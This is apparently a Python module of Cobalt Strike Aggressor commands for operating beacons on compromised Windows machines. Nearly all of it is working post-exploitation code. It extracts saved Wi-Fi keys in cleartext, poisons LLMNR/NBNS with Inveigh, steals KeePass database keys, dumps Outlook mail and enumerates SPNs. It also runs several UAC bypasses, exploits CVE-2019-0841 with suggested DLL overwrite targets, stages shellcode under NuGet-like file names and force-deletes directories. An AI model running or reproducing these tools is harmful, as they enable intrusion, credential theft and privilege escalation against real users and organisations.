def _(bid, profile): command = """ netsh wlan export profile name="{name}" folder=$env:temp key=clear' get-content $env:temp:\*{name}*.xml | select-string -pattern '(keyMaterial)|(keyType)' rm $profile $env:temp:\*{name}*.xml """.format(name=profile) aggressor.bpowerpick(bid, command)
def run(bid, program, args=None, silent=False): # no args if not args: args = [] if program in assemblies: assembly = assemblies[program] args = helpers.eaq(args) if not silent: aggressor.btask(bid, 'Tasked beacon to run {} {}'.format(program, args)) aggressor.bexecute_assembly(bid, assembly, args, silent=True) elif program in powershell: script = powershell[program] aggressor.bpowershell_import(bid, script) if isinstance(args, list) or isinstance(args, tuple): args = ' '.join(powershell_quote(args)) aggressor.bpowerpick(bid, ' '.join(args)) elif program in callbacks: callback = callbacks[program] callback(bid, args, silent=silent) else: raise RuntimeError('Unrecognized program: {}'.format(program))
def _(bid): command = textwrap.dedent(""" ls $env:localappdata ls $env:appdata """) aggressor.bpowerpick(bid, command)
def _(bid, runtime=99999, *args): aggressor.bpowershell_import( bid, utils.basedir('powershell/Inveigh/Inveigh.ps1')) aggressor.bpowerpick( bid, "Invoke-Inveigh -ConsoleOutput N -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}" .format(runtime, ' '.join(args)))
def _(bid): command = """ wmic os get Caption /value | more wmic qfe """ aggressor.bpowerpick(bid, command)
def _(bid): command = '' for d in ['Desktop', 'Documents', 'Downloads']: command += 'ls $env:userprofile\\{}\n'.format(d) aggressor.bpowerpick(bid, command)
def _(bid): command = helpers.code_string(""" ls $env:localappdata ls $env:appdata """) aggressor.bpowerpick(bid, command)
def elevate_token_shellcode_csharp(bid, shellcode): """ Elevate with token duplication bypass. Execute `shellcode` with a C# helper. """ aggressor.bpowershell_import( bid, utils.basedir('modules/FilelessUACBypass.ps1')) execute_shellcode = utils.basedir('tools/execute_shellcode.exe') execute_assembly = utils.basedir('tools/execute_assembly.exe') stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid)) #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid)) stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid)) package = r'{}\nuget.package'.format(helpers.guess_temp(bid)) helpers.upload_to(bid, execute_assembly, stage1) helpers.upload_to(bid, execute_shellcode, stage2) helpers.upload_to(bid, shellcode, package) command = 'Invoke-TokenDuplication -Binary {}'.format( powershell_quote(stage2)) aggressor.bpowerpick(bid, command) aggressor.brm(bid, stage1) aggressor.brm(bid, stage2) aggressor.brm(bid, package)
def _(bid): command = textwrap.dedent(""" wmic os get Caption /value | more wmic qfe """) aggressor.btask(bid, 'Tasked beacon to get patch status') aggressor.bpowerpick(bid, command, silent=True)
def _(bid): command = '' for d in ['Desktop', 'Documents', 'Downloads', 'Favorites']: command += 'ls $env:userprofile\\{}\n'.format(d) aggressor.btask(bid, 'Tasked beacon to show common document folders') aggressor.bpowerpick(bid, command, silent=True)
def _(bid): command = textwrap.dedent(""" ls $env:localappdata ls $env:appdata """) aggressor.btask(bid, 'Tasked beacon to show AppData') aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args): parser = helpers.ArgumentParser(bid=bid, prog='outlook') parser.add_argument('-f', '--folder', help='Folder name to grab') parser.add_argument('-s', '--subject', help='Match subject line (glob)') parser.add_argument('-t', '--top', metavar='N', type=int, help='Only show top N results') parser.add_argument('-d', '--dump', action='store_true', help='Get full dump') parser.add_argument('-o', '--out', help='Output file') try: args = parser.parse_args(args) except: return command = '' command += outlook() # -f/--folder if args.folder: # specified folder #folder = args.folder.lstrip('\\') command += helpers.code_string(r""" $folder = $namespace.Folders.Item("{}") """.format(folder)) else: # inbox command += helpers.code_string(r""" $folder = $namespace.getDefaultFolder($folders::olFolderInBox) """) command += helpers.code_string(r""" $folder.items""") # -s/--subject if args.subject: command += ' | Where-Object {{$_.Subject -Like "{}"}}'.format( args.subject) # -t/--top if args.top: command += ' | select -First {}'.format(args.top) # -d/--dump if not args.dump: # print summary only #command += ' | Format-Table -AutoSize Subject, ReceivedTime, SenderName, SenderEmailAddress' command += ' | Select-Object -Property Subject, ReceivedTime, SenderName, SenderEmailAddress' # -o/--out if args.out: command += ' > {}'.format(args.out) aggressor.bpowerpick(bid, command)
def _(bid): command = helpers.code_string(r""" Get-Childitem -path env:* | Select-Object Name, Value | Sort-Object name | Format-Table -Auto """) aggressor.bpowerpick(bid, command)
def _(bid): command = helpers.code_string(r""" Get-Process | Where { $_.mainWindowTitle } | Format-Table id,name,mainwindowtitle -AutoSize """) aggressor.btask(bid, 'Tasked beacon to list open windows') aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *command): global _old_bpowerpick command = ' '.join(command) if _old_bpowerpick: _old_bpowerpick(bid, command) else: aggressor.bpowerpick(bid, command)
def _(bid): command = textwrap.dedent(r""" Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, InstallDate | Sort-Object -Property DisplayName | Format-Table -AutoSize """) aggressor.bpowerpick(bid, command)
def _(bid): # KeePassConfig aggressor.bpowershell_import(bid, utils.basedir('powershell/KeePassconfig.ps1')) aggressor.bpowerpick(bid, "Find-KeePassconfig") # KeeThief aggressor.bpowershell_import(bid, utils.basedir('powershell/KeeThief.ps1')) aggressor.bpowerpick(bid, "Get-KeePassDatabaseKey -Verbose")
def _(bid, pattern, out=None): import_host_recon(bid) command = 'Get-IndexedFiles {}'.format(powershell_quote(pattern)) if out: # output to file command += ' > {}'.format(powershell_quote(out)) aggressor.bpowerpick(bid, command)
def elevate_slui_command(bid, command): """ Elevate with slui bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/FilelessUACBypass.ps1')) aggressor.bpowerpick( bid, 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command)))
def _(bid): command = textwrap.dedent(r""" Get-Childitem -path env:* | Select-Object Name, Value | Sort-Object name | Format-Table -Auto """) aggressor.btask(bid, 'Tasked beacon to get environmental variables') aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] command = '' for d in dirs: command += 'Get-ChildItem -Recurse "{}"\n'.format(d) aggressor.bpowerpick(bid, command)
def _(bid, *dirs): if not dirs: aggressor.berror('rmr: specify some directories to kill') return command = '' for d in dirs: command += 'Remove-Item -Recurse -Force "{}"\n'.format(d) aggressor.bpowerpick(bid, command)
def _(bid, out=None): aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1')) command = 'Get-AccountSPNs' if out: # output to file command += ' > {}'.format(powershell_quote(out)) aggressor.bpowerpick(bid, command)
def elevate_wscript_command(bid, command): """ Elevate with wscript bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/Invoke-WScriptBypassUAC.ps1')) aggressor.bpowerpick( bid, 'Invoke-WScriptBypassUAC -payload {}'.format( powershell_quote(command)))
def elevate_eventvwr_command(bid, command): """ Elevate with eventvwr bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/Invoke-EventVwrBypass.ps1')) aggressor.bpowerpick( bid, 'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command)))
def elevate_cve_2019_0841(bid, target, overwrite=None): r""" Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally overwrite 'target' with 'overwrite'. Good overwrite options: - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate) - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually) """ native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1') edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*' settings_dat = r'\Settings\settings.dat' command = helpers.code_string(r""" # Stop Edge echo "[.] Stopping Edge" $process = Get-Process -Name MicrosoftEdge 2>$null if ($process) {{ $process | Stop-Process }} sleep 3 # Hardlink $edge_dir = Resolve-Path {edge_dir} $settings_dat = $edge_dir.Path + '{settings_dat}' echo "[.] Making Hardlink from $settings_dat to {target}" rm $settings_dat Native-HardLink -Verbose -Link $settings_dat -Target {target} # Start Edge echo "[.] Starting Edge" Start Microsoft-Edge: sleep 3 # Stop it again echo "[.] Stopping Edge" $process = Get-Process -Name MicrosoftEdge 2>$null if ($process) {{ $process | Stop-Process }} echo "[+] All Finished!" echo "[.] New ACLs:" Get-Acl {target} | Format-List """.format(edge_dir=edge_dir, settings_dat=settings_dat, target=powershell_quote(target))) aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True) aggressor.bpowerpick(bid, command, silent=True) if overwrite: helpers.upload_to(bid, overwrite, target) helpers.explorer_stomp(bid, target)
def _(bid): command = helpers.code_string(r""" if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { echo "User is a local admin!"; } else { echo "User is not local admin :("; } """) aggressor.btask(bid, 'Tasked beacon to check if user is a local admin') aggressor.bpowerpick(bid, command, silent=True)
def _(bid): command = helpers.code_string(r""" If ((gwmi win32_computersystem).partofdomain){ Write-Output "User is in domain: $env:userdomain" } Else { Write-Output "User is not in a domain" } """) aggressor.btask(bid, "Tasked beacon to check if it's in a domain") aggressor.bpowerpick(bid, command, silent=True)
def _(bid, profile=None): if profile: command = helpers.code_string(""" netsh wlan export profile name="{name}" folder=$env:temp key=clear $profile = $env:temp:\*{name}*.xml get-content $profile rm $profile """.format(name=profile)) aggressor.bpowerpick(bid, command) else: aggressor.bshell(bid, 'netsh wlan show profiles name="*" key=clear');
def _(bid): command = helpers.code_string(r""" wmic os get Caption /value Get-WmiObject -class Win32_quickfixengineering | Select-Object HotFixID,Description,InstalledBy,InstalledOn | Sort-Object InstalledOn -Descending | Format-Table -Auto """) aggressor.btask(bid, 'Tasked beacon to get patch info') aggressor.bpowerpick(bid, command, silent=True)